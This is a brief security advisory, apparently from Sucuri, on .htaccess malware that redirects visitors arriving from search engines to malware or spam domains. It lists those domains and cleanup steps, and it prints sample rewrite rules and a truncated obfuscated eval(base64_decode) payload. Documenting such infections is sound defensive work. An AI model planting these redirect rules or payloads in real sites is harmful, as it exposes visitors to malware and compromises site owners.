Description:
This attack uses the .htaccess file to redirect users to a site serving malware (or spam). In some cases, the index.php is also modified to do the redirection as well.
Loads malware from:
http://fgnfdfthrv.bee.pl/
alolipololi.osa.pl
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
and other domains.Affecting: Any type of web site (no specific target).
Clean up and details: Remove offending code from .htaccess and/or index.php or contact support@sucuri.net for help.
Links:
http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html
Malware samples:
..
RewriteCond %{HTTP_REFERER} .flickr. [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteRule .* http://fgnfdfthrv.bee.pl/?q= [R,L] eval (base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIV..